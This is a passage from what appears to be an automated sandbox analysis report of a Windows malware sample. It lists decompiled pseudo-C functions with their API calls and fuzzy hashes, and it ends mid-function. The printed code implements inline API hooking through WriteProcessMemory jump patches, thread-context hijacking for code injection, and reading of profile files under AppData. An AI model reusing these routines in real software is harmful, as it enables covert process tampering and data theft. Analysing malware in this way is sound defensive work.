    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 00423F51
    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00423F85
    • HeapFree.KERNEL32(?,00000000,?), ref: 00423F98
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$ObjectSingleWait
    • String ID:
    • API String ID: 3267977683-0
    • Opcode ID: 9098a6b1febd1c8eb943cb92da3de6c9209545c691cb58d17b0afa98e8dc7885
    • Instruction ID: c0138160413d9f3245f443c2b03654b03d0d3b66ba5332b5eee5ef0cc6cca522
    • Opcode Fuzzy Hash: 9098a6b1febd1c8eb943cb92da3de6c9209545c691cb58d17b0afa98e8dc7885
    • Instruction Fuzzy Hash: 7F5103717083115AC320DF66E940B9BB7F5AB94705F84096FF98097350D63CDE49CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00407570(void* __eflags) {
    				intOrPtr _v32;
    				char _v556;
    				short _v1068;
    				short _v1076;
    				char _v1560;
    				short _v1580;
    				short _v1588;
    				char _v1596;
    				char _v2112;
    				short _v2116;
    				char _v2168;
    				short _v2200;
    				char _v2220;
    				short _v2240;
    				short _v2252;
    				void* __esi;
    				char* _t27;
    				signed int _t28;
    				long _t29;
    				signed int _t31;
    				short* _t39;
    				signed char _t42;
    				WCHAR* _t45;
    				WCHAR* _t48;
    				WCHAR* _t70;
    				WCHAR* _t71;
    				WCHAR* _t75;
    				long _t76;
    				void* _t80;
    
    				_t70 =  &_v2112;
    				E00424100(0x2a, _t70);
    				_t27 =  &_v1560;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t27);
    				if(_t27 == 0) {
    					_t45 = _t70;
    					while(1) {
    						_t28 =  *_t45 & 0x0000ffff;
    						if(_t28 != 0x5c && _t28 != 0x2f) {
    							break;
    						}
    						_t45 =  &(_t45[1]);
    					}
    					_t29 = PathCombineW( &_v1580,  &_v1580, _t45);
    					__eflags = _t29;
    					if(_t29 == 0) {
    						L27:
    						return _t29;
    					}
    					_t71 =  &_v2168;
    					E00424100(0x2c, _t71);
    					_t48 = _t71;
    					while(1) {
    						_t31 =  *_t48 & 0x0000ffff;
    						__eflags = _t31 - 0x5c;
    						if(_t31 == 0x5c) {
    							goto L9;
    						}
    						__eflags = _t31 - 0x2f;
    						if(_t31 != 0x2f) {
    							_t29 = PathCombineW( &_v1068,  &_v1588, _t48);
    							__eflags = _t29;
    							if(_t29 == 0) {
    								goto L27;
    							}
    							_t29 = GetFileAttributesW( &_v1076);
    							__eflags = _t29 - 0xffffffff;
    							if(_t29 == 0xffffffff) {
    								goto L27;
    							}
    							E00424100(0x2d,  &_v2220);
    							E00424100(0x2e,  &_v2200);
    							E00424100(0x2f,  &_v2252);
    							_t42 = 0;
    							__eflags = 0;
    							while(1) {
    								_push(_t42 & 0x000000ff);
    								_t75 =  &_v2240;
    								_t29 = E00411D10(_t42 & 0x000000ff, 0xa, _t75,  &_v2220);
    								_t80 = _t80 + 8;
    								__eflags = _t29 - 1;
    								if(_t29 < 1) {
    									break;
    								}
    								_t29 = GetPrivateProfileIntW(_t75,  &_v2200, 0xffffffff,  &_v1076);
    								_t76 = _t29;
    								__eflags = _t76 - 0xffffffff;
    								if(_t76 == 0xffffffff) {
    									break;
    								}
    								_t29 = GetPrivateProfileStringW( &_v2240,  &_v2252, 0,  &_v2116, 0x104,  &_v1076);
    								__eflags = _t29;
    								if(_t29 == 0) {
    									L25:
    									_t42 = _t42 + 1;
    									__eflags = _t42 - 0xfa;
    									if(_t42 < 0xfa) {
    										continue;
    									}
    									break;
    								}
    								__eflags = _v2116;
    								_t39 =  &_v2116;
    								if(_v2116 == 0) {
    									L21:
    									_t56 =  &_v2116;
    									__eflags = _t76 - 1;
    									if(__eflags != 0) {
    										L24:
    										_t29 = E00407750(_t56, _v32, __eflags);
    										__eflags = _t29;
    										if(_t29 == 0) {
    											break;
    										}
    										goto L25;
    									}
    									_t29 = E004188B0( &_v2116,  &_v556,  &_v1596);
    									__eflags = _t29;
    									if(__eflags == 0) {
    										goto L25;
    									}
    									_t56 =  &_v556;
    									goto L24;
    								}
    								do {
    									__eflags =  *_t39 - 0x2f;
    									if( *_t39 == 0x2f) {
    										 *_t39 = 0x5c;
    									}
    									_t39 = _t39 + 2;
    									__eflags =  *_t39;
    								} while ( *_t39 != 0);
    								goto L21;
    							}
    							goto L27;
    						}
    						L9:
    						_t48 =  &(_t48[1]);
    					}
    				}
    				return _t27;
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,00000000), ref: 00407595
    • PathCombineW.SHLWAPI(?,?,?,00000000), ref: 004075CA
    • PathCombineW.SHLWAPI(?,?,?), ref: 00407607
    • GetFileAttributesW.KERNEL32(?), ref: 00407619
    • GetPrivateProfileIntW.KERNEL32 ref: 00407697
    • GetPrivateProfileStringW.KERNEL32 ref: 004076C5
      • Part of subcall function 004188B0: PathCombineW.SHLWAPI(?,?,00000000,00407718,?,?), ref: 004188D1
      • Part of subcall function 00407750: PathCombineW.SHLWAPI(?,00000000,?,74B39600,00000000), ref: 00407789
      • Part of subcall function 00407750: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004077AE
      • Part of subcall function 00407750: WriteFile.KERNEL32(00000000,?,00000146,?,00000000,74B396D0,00000000), ref: 004077EA
      • Part of subcall function 00407750: FlushFileBuffers.KERNEL32(00000000), ref: 0040782A
      • Part of subcall function 00407750: CloseHandle.KERNEL32(00000000), ref: 00407831
      • Part of subcall function 00407750: SetFileAttributesW.KERNEL32(?,00000080), ref: 00407847
      • Part of subcall function 00407750: DeleteFileW.KERNEL32(?), ref: 00407852
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Path$Combine$AttributesPrivateProfile$BuffersCloseCreateDeleteFlushFolderHandleStringWrite
    • String ID:
    • API String ID: 3306863732-0
    • Opcode ID: 206c51e1a98da3b724f8fc501e884838eeb9201c231c6063b71490ad67b3a7c1
    • Instruction ID: c16e94b22fdeb483b2d5438ffeaf8efbdd236a581d4ef31312b174f3bee3cc28
    • Opcode Fuzzy Hash: 206c51e1a98da3b724f8fc501e884838eeb9201c231c6063b71490ad67b3a7c1
    • Instruction Fuzzy Hash: 4841C372A083009AD7249720DC44BFB73A9EBC5350F50492EF695A32D0EB78B945C7AB
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00416FD0(void* __edi, void* _a8) {
    				long _v0;
    				intOrPtr _v4;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				long _v40;
    				intOrPtr _v43;
    				void _v44;
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				void* _t34;
    				void* _t41;
    				intOrPtr* _t52;
    				intOrPtr _t55;
    				intOrPtr _t60;
    				void* _t67;
    				long _t68;
    				long _t69;
    				void* _t70;
    				long* _t71;
    
    				_t67 = __edi;
    				_t71 =  &_v40;
    				_t70 = _a8;
    				_t68 = 0;
    				_a8 = 0;
    				if(VirtualQueryEx(0xffffffff, __edi,  &_v36, 0x1c) == 0 || _v36.State != 0x1000 || (_v36.Protect & 0x00000101) != 0) {
    					L22:
    					return _t68;
    				} else {
    					_t55 = _v36.RegionSize;
    					_t34 = __edi - _v36.BaseAddress;
    					if(_t55 <= _t34 || _t55 - _t34 < 0x1e || VirtualProtectEx(0xffffffff, __edi, 0x1e, 0x40,  &_v40) == 0) {
    						goto L22;
    					} else {
    						_t63 =  &_v36;
    						E00410870(_t35, _t63, 0xffffff90, 0x23);
    						if(ReadProcessMemory(0xffffffff, __edi, _t63, 0x1e, 0) == 0) {
    							L21:
    							VirtualProtectEx(0xffffffff, _t67, 0x1e, _v40,  &_v40);
    							goto L22;
    						}
    						_t52 =  &_v36;
    						_push(0);
    						_push(_t52);
    						_t41 = E00428520(_t52, _t52, _t63, __edi, 0);
    						if(_t41 == 0xffffffff) {
    							L20:
    							_t68 = _v0;
    							goto L21;
    						} else {
    							while(1) {
    								_t68 = _t68 + _t41;
    								if(_t68 > 0x1e) {
    									goto L20;
    								}
    								_t60 =  *_t52;
    								if(_t60 == 0xe9 || _t60 == 0xe8) {
    									if(_t41 == 5) {
    										_t63 = _t67 - _t70;
    										 *((intOrPtr*)(_t52 + 1)) =  *((intOrPtr*)(_t52 + 1)) + _t67 - _t70;
    									}
    								}
    								_push(0);
    								if(_t68 >= 5) {
    									 *((char*)(_t71 + _t68 + 0x14)) = 0xe9;
    									 *((intOrPtr*)(_t71 + _t68 + 0x15)) = _t67 - _t70 - 5;
    									_t69 = _t68 + 5;
    									if(WriteProcessMemory(0xffffffff, _t70,  &_v44, _t69, ??) != 0) {
    										_v44 = 0xe9;
    										_v43 = _v4 - _t67 - 5;
    										E0041E4F0(_t67, _t70);
    										if(WriteProcessMemory(0xffffffff, _t67,  &_v44, 5, 0) != 0) {
    											_v0 = _t69;
    										}
    									}
    									goto L20;
    								}
    								_t52 = _t71 + _t68 + 0x14;
    								_push(_t52);
    								_t41 = E00428520(_t52, _t60, _t63, _t67, _t68);
    								if(_t41 != 0xffffffff) {
    									continue;
    								}
    								goto L20;
    							}
    							goto L20;
    						}
    					}
    				}
    			}

    APIs
    • VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,?,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,00000000), ref: 00416FE9
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,00000040,?), ref: 0041703C
    • ReadProcessMemory.KERNEL32(000000FF,?,?,0000001E,00000000,?,00000090,00000023), ref: 00417061
    • WriteProcessMemory.KERNEL32(000000FF,?,?,-00000005,00000000,?,00000000,00000034,?,0000001E,00000000,?,00000090,00000023), ref: 004170ED
    • WriteProcessMemory.KERNEL32(000000FF,?,?,00000005,00000000,?,0000001E,00000000,?,00000090,00000023), ref: 0041711A
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,?,?,?,0000001E,00000000,?,00000090,00000023), ref: 00417138
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID:
    • API String ID: 390532180-0
    • Opcode ID: 5f73c79d4f6ff4dd20695abbf914155f170e0ae0e7380ae030a7986994e5d9b5
    • Instruction ID: 05684c7ae425e4c1ec781a217b4c407c4843b03b8e60d7174c983ccef31ab353
    • Opcode Fuzzy Hash: 5f73c79d4f6ff4dd20695abbf914155f170e0ae0e7380ae030a7986994e5d9b5
    • Instruction Fuzzy Hash: D34116316083517BCA20DE398D48EAB7BF89B89730F54471EF671863D0D674D888876A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E004193E0(void** __esi, void** _a4, intOrPtr* _a8, intOrPtr _a12) {
    				void* _v4;
    				void* _v12;
    				void* _v16;
    				signed char _v20;
    				void _v24;
    				long _v28;
    				void* __ebx;
    				void* __edi;
    				long _t32;
    				union _LARGE_INTEGER _t36;
    				long _t46;
    				void* _t64;
    				void** _t65;
    				signed int _t66;
    
    				_t65 = __esi;
    				while(1) {
    					_push(1);
    					if(SetFilePointerEx( *_t65, 0, 0,  &_v16) == 0) {
    						_t66 = _t66 | 0xffffffff;
    						_v4 = _t66;
    					} else {
    						_t66 = _v16;
    						_v4 = _v12;
    					}
    					if(ReadFile( *_t65,  &_v24, 5,  &_v28, 0) == 0) {
    						break;
    					}
    					_t32 = _v28;
    					if(_t32 == 0) {
    						 *_a8 = 0;
    						return 1;
    					} else {
    						if(_t32 != 5) {
    							break;
    						} else {
    							_t36 = _v24 ^ _t65[4];
    							_v24 = _t36;
    							if(_t36 > 0xa00000) {
    								break;
    							} else {
    								if((_v20 & 0x00000001) != 0 || _t36 == 0) {
    									_push(1);
    									if(SetFilePointerEx( *_t65, _t36, 0, 0) != 0) {
    										continue;
    									} else {
    										return 0;
    									}
    								} else {
    									_t64 = HeapAlloc( *0x42e6d4, 8, _t36 + 4);
    									if(_t64 == 0) {
    										break;
    									} else {
    										if(ReadFile( *_t65, _t64, _v24,  &_v28, 0) == 0) {
    											L18:
    											HeapFree( *0x42e6d4, 0, _t64);
    											break;
    										} else {
    											_t49 = _v24;
    											if(_v28 != _v24) {
    												goto L18;
    											} else {
    												_t46 = E00419020(_a12, _t49, _t64);
    												_v28 = _t46;
    												if(_t46 == 0) {
    													goto L18;
    												} else {
    													 *_a4 = _t64;
    													 *_a8 = _t46;
    													_t65[2] = _t66;
    													_t65[3] = _v4;
    													return 1;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					L20:
    				}
    				return 0;
    				goto L20;
    			}

    APIs
    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,?,?,?), ref: 004193FE
    • ReadFile.KERNEL32(?,?,00000005,?,00000000,?,?,?,?,?), ref: 0041942A
    • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,?), ref: 00419474
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Pointer$Read
    • String ID:
    • API String ID: 2010065189-0
    • Opcode ID: a692020e76975b26a13654b25d12813faf19110e570f83e1123829bd4a461392
    • Instruction ID: 98c380bb5468be66fe6e4a1e5805070e485ea6b58552d792b3a7d3c6a9e40188
    • Opcode Fuzzy Hash: a692020e76975b26a13654b25d12813faf19110e570f83e1123829bd4a461392
    • Instruction Fuzzy Hash: 25416B71204301AFD314CF56D890EABB7E9EBD8710F50892EF99097290DB35EC86CB26
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00419ED0(void** _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed char _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
    				void** _v36;
    				void** _v44;
    				struct _CONTEXT _v768;
    				void* __esi;
    				intOrPtr _t30;
    				long _t34;
    				signed char _t44;
    				void* _t45;
    				void** _t58;
    				intOrPtr _t59;
    				signed int _t63;
    				intOrPtr _t64;
    				void* _t65;
    
    				_t44 = _a32;
    				_t64 = _a8;
    				_t58 = _a4;
    				_t30 =  *0x42e91c(_t58, _t64, _a12, _a16, _a20, _a24, _a28, _t44, _a36, _a40, _a44);
    				_t59 = _t30;
    				_v768.Dr0 = _t59;
    				if(_t59 < 0 || (_t44 & 0x00000001) == 0 || _t58 == 0 || _t64 == 0) {
    					return _t30;
    				} else {
    					if(WaitForSingleObject( *0x42edbc, 0) == 0) {
    						L14:
    						return _t59;
    					}
    					_t34 = GetProcessId( *_t58);
    					_t71 = _t34;
    					if(_t34 == 0) {
    						goto L14;
    					}
    					_t65 = E0041CCB0(_t71, _t34);
    					if(_t65 == 0) {
    						goto L14;
    					}
    					_t45 = E0041CE60( *_t58, _t65, 0);
    					_t63 = _t45 -  *0x42e90c + E0041D8F0;
    					_v768.ContextFlags = 0x10003;
    					if(GetThreadContext( *_v44,  &_v768) == 0 || _v768.EFlags !=  *0x42e924) {
    						L12:
    						VirtualFreeEx( *_t58, _t45, 0, 0x8000);
    					} else {
    						if(( *0x42e8f8 & 0x00000010) != 0) {
    							_t63 = _t63 ^ _v768.Eip;
    						}
    						_v768.Eip = _t63;
    						_v768.Dr1.ContextFlags = 0x10002;
    						if(SetThreadContext( *_v36,  &(_v768.Dr1)) == 0) {
    							goto L12;
    						}
    					}
    					CloseHandle(_t65);
    					return _v768.Dr0;
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00419F68
    • GetProcessId.KERNEL32(00000000), ref: 00419F79
      • Part of subcall function 0041CCB0: CreateMutexW.KERNEL32(0042E930,00000001,00000000,?,00000102,00000002,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD41
      • Part of subcall function 0041CCB0: GetLastError.KERNEL32(?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD4D
      • Part of subcall function 0041CCB0: CloseHandle.KERNEL32(00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD5B
      • Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,00000010), ref: 0041CE9B
      • Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CED3
      • Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CEF7
      • Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,?,00000010), ref: 0041CF25
      • Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,000004B0,?,00000004,00000000,?,00000010), ref: 0041CF38
      • Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001,?,00000010), ref: 0041CF4E
    • GetThreadContext.KERNEL32(00000000,00000000), ref: 00419FC8
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041A00F
    • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0041A024
    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00008000), ref: 0041A02B
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Handle$Process$DuplicateMemoryWrite$CloseContextThread$CreateErrorFreeLastMutexObjectSingleVirtualWait
    • String ID:
    • API String ID: 199599979-0
    • Opcode ID: 2522bbd70dfef54fa712c3c0c53d98b04c48da43ffe91d15ac0217bdf0412407
    • Instruction ID: 5253218a2d70581624539440a9c609992194c3e34a9ba0428862ef3d8fda61a1
    • Opcode Fuzzy Hash: 2522bbd70dfef54fa712c3c0c53d98b04c48da43ffe91d15ac0217bdf0412407
    • Instruction Fuzzy Hash: EC416D712053469BD334DF54DD88FABB7A8FB8C740F04452EFA4893251D779AC818B6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00419530(void** __esi) {
    				signed int _v8;
    				void* _v12;
    				signed char _v16;
    				void _v20;
    				long _v24;
    				union _LARGE_INTEGER _t38;
    				void** _t59;
    
    				_t59 = __esi;
    				_t38 = 0;
    				if((__esi[2] & __esi[3]) != 0xffffffff) {
    					_push(1);
    					if(SetFilePointerEx( *__esi, 0, 0,  &_v12) != 0 && (_v12 & _v8) != 0xffffffff) {
    						_push(0);
    						if(SetFilePointerEx( *__esi, __esi[2], __esi[3], 0) != 0) {
    							if(ReadFile( *__esi,  &_v20, 5,  &_v24, 0) != 0 && _v24 == 5) {
    								_v16 = _v16 | 0x00000001;
    								if(E00418100(0,  *__esi, __esi[2], __esi[3]) != 0 && WriteFile( *__esi,  &_v20, 5,  &_v24, 0) != 0 && _v24 == 5) {
    									FlushFileBuffers( *__esi);
    									_t38 = 1;
    								}
    							}
    							_push(0);
    							SetFilePointerEx( *_t59, _v12, _v8, 0);
    						}
    					}
    				}
    				return _t38;
    			}

    APIs
    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00419562
    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0041958C
    • ReadFile.KERNEL32(?,?,00000005,?,00000000), ref: 004195A3
    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,00000005,?,00000000), ref: 0041960D
      • Part of subcall function 00418100: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00419240,?,00000000,?,?,00000000), ref: 00418112
    • WriteFile.KERNEL32(?,?,00000005,?,00000000,?,?,?,?,?), ref: 004195E0
    • FlushFileBuffers.KERNEL32(?,?,?,00000005,?,00000000,?,?,?,?,?), ref: 004195F4
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Pointer$BuffersFlushReadWrite
    • String ID:
    • API String ID: 2654796190-0
    • Opcode ID: 7691ef1c3d730a3abbd39d3c1acb3fb3a9d845bb1f5fff1586ceb5e4d88c6963
    • Instruction ID: 8095ae20fc1a4646d0c39d8b082c0b01b9a4ac2dc8f3a1352905e55eb63e8fe9
    • Opcode Fuzzy Hash: 7691ef1c3d730a3abbd39d3c1acb3fb3a9d845bb1f5fff1586ceb5e4d88c6963
    • Instruction Fuzzy Hash: C1314971200301AFE724DF64CC95F67B3EAAB84720F148A1EF9A197290D674EC85CF69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E00423620(struct _CRITICAL_SECTION* _a4) {
    				void* _t19;
    				void* _t21;
    				void* _t25;
    				signed short _t31;
    				signed int _t44;
    				intOrPtr* _t50;
    
    				_t50 = _a4;
    				_t44 = 0;
    				if(_t50 == 0 ||  *_t50 == 0) {
    					L7:
    					EnterCriticalSection(0x42ede8);
    					_t31 = ( *0x42ede4 & 0x0000ffff) + _t44;
    					if(_t31 <= 0x3e8) {
    						if(E00410740(_t31 + _t31, 0x42eddc) != 0) {
    							E00410820( *0x42eddc + ( *0x42ede4 & 0x0000ffff) * 2, _t50, _t44 + _t44);
    							 *0x42ede4 = _t31;
    						}
    					} else {
    						_t19 =  *0x42eddc;
    						_push(0x7d4);
    						if(_t19 != 0) {
    							_t21 = HeapReAlloc( *0x42e6d4, 8, _t19, ??);
    						} else {
    							_t21 = HeapAlloc( *0x42e6d4, 8, ??);
    						}
    						if(_t21 != 0) {
    							 *0x42eddc = _t21;
    							E00410820(_t21, _t21 + (( *0x42ede4 & 0x0000ffff) - 0x3e8 - _t44) * 2, 0x7d0);
    							E00410820(0x7d0 +  *0x42eddc, _t50, _t44 + _t44);
    							 *0x42ede4 = 0x3e8;
    						}
    					}
    					_a4 = 0x42ede8;
    					return LeaveCriticalSection(??);
    				} else {
    					do {
    						_t44 = _t44 + 1;
    					} while ( *((short*)(_t50 + _t44 * 2)) != 0);
    					if(_t44 <= 0x3e8) {
    						goto L7;
    					} else {
    						EnterCriticalSection(0x42ede8);
    						_t25 =  *0x42eddc;
    						if(_t25 != 0) {
    							HeapFree( *0x42e6d4, 0, _t25);
    						}
    						 *0x42eddc = 0;
    						 *0x42ede4 = 0;
    						_a4 = 0x42ede8;
    						return LeaveCriticalSection(??);
    					}
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(0042EDE8,?,?,004239B2,?), ref: 00423648
    • HeapFree.KERNEL32(?,00000000,?,?,?,004239B2,?), ref: 00423660
    • EnterCriticalSection.KERNEL32(0042EDE8,?,?,?,?,004239B2,?), ref: 00423690
    • HeapAlloc.KERNEL32(?,00000008,000007D4,?,?,?,?,004239B2,?), ref: 004236BE
    • HeapReAlloc.KERNEL32(?,00000008,?,000007D4,?,?,?,?,004239B2,?), ref: 004236CF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocCriticalEnterSection$Free
    • String ID: B
    • API String ID: 2574396306-3806887055
    • Opcode ID: aa6929fe1946cdf6e39f5eda5832efb5362380deec4694b7157f30b47ce73641
    • Instruction ID: f37a4168a01fcecf5927478e9a721e909238b51b62607e188658851c13f31b36
    • Opcode Fuzzy Hash: aa6929fe1946cdf6e39f5eda5832efb5362380deec4694b7157f30b47ce73641
    • Instruction Fuzzy Hash: 8D31D071700211ABD7209F56FD88AA733BCEB84705F84853BF501D7260EB78A946CB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D240() {
    				void _t12;
    				void* _t15;
    				void* _t16;
    				void _t18;
    				void* _t26;
    				void* _t27;
    
    				_t27 = HeapAlloc( *0x42e6d4, 8, 0x334);
    				if(_t27 == 0) {
    					L20:
    					return 0;
    				} else {
    					_t26 = HeapAlloc( *0x42e6d4, 8, 0x334);
    					if(_t26 == 0) {
    						goto L20;
    					} else {
    						 *_t27 = 1;
    						 *(_t27 + 0x32c) = 0x42e7f0;
    						 *_t26 = 0;
    						 *(_t26 + 0x32c) = 0x42e7f0;
    						if( *0x42e7f0 < 0x40) {
    							if(E0040CEE0 == 0) {
    								L8:
    								_t18 = 1;
    							} else {
    								_t16 = CreateThread(0, 0, E0040CEE0, _t27, 0, 0);
    								if(_t16 != 0) {
    									 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t16;
    									 *0x42e7f0 =  *0x42e7f0 + 1;
    									goto L8;
    								} else {
    									_t18 = 0;
    								}
    							}
    						} else {
    							SetLastError(0x9b);
    							_t18 = 0;
    						}
    						if( *0x42e7f0 < 0x40) {
    							if(E0040CEE0 == 0) {
    								L15:
    								_t12 = 1;
    							} else {
    								_t15 = CreateThread(0, 0, E0040CEE0, _t26, 0, 0);
    								if(_t15 != 0) {
    									 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t15;
    									 *0x42e7f0 =  *0x42e7f0 + 1;
    									goto L15;
    								} else {
    									_t12 = 0;
    								}
    							}
    						} else {
    							SetLastError(0x9b);
    							_t12 = 0;
    						}
    						if(_t18 != 0 || _t12 != 0) {
    							return 1;
    						} else {
    							return 0;
    						}
    					}
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000334,00000000,00000000,0041D676,0042E7F0,00000000,00000104), ref: 0040D255
    • HeapAlloc.KERNEL32(?,00000008,00000334), ref: 0040D26F
    • SetLastError.KERNEL32(0000009B,?,00000010), ref: 0040D2A8
    • CreateThread.KERNEL32 ref: 0040D2C9
    • SetLastError.KERNEL32(0000009B,?,00000010), ref: 0040D2F7
    • CreateThread.KERNEL32 ref: 0040D318
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocCreateErrorHeapLastThread
    • String ID:
    • API String ID: 3580101977-0
    • Opcode ID: 757b3dbb6c3b49d1bb4ef64bcc431667ffde5e853f205505721640e77b51621b
    • Instruction ID: 113441ecf620b1ff8bc75dac57876e34efd06c42e4e9c895a971e4934d57afb4
    • Opcode Fuzzy Hash: 757b3dbb6c3b49d1bb4ef64bcc431667ffde5e853f205505721640e77b51621b
    • Instruction Fuzzy Hash: 4B214730B80351A7E73017F67D02BA37B899BA2740F550077F940BB2D0E2F9A806875D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00416F00(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				int _v4;
    				long _v8;
    				struct HWND__* _t12;
    				long _t16;
    				long _t17;
    				void* _t23;
    				int _t37;
    				struct HWND__* _t39;
    				intOrPtr* _t40;
    
    				_t37 = __ecx;
    				_push(_a8);
    				_t40 = __edx;
    				_v4 = __ecx;
    				_t12 = WindowFromPoint(_a4.x);
    				_t39 = _t12;
    				if(_t39 == 0) {
    					return _t12;
    				} else {
    					_t16 = SendMessageTimeoutW(_t39, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _t37,  &_v8);
    					if(_t16 != 0) {
    						_t17 = _v8;
    						if(_t17 != 0xffffffff) {
    							if(_t40 != 0) {
    								 *_t40 = _t17;
    							}
    							return _t39;
    						}
    						SetWindowLongW(_t39, 0xfffffff0, GetWindowLongW(_t39, 0xfffffff0) | 0x08000000);
    						_t23 = E00416F00(_v4, _t40, _a4, _a8);
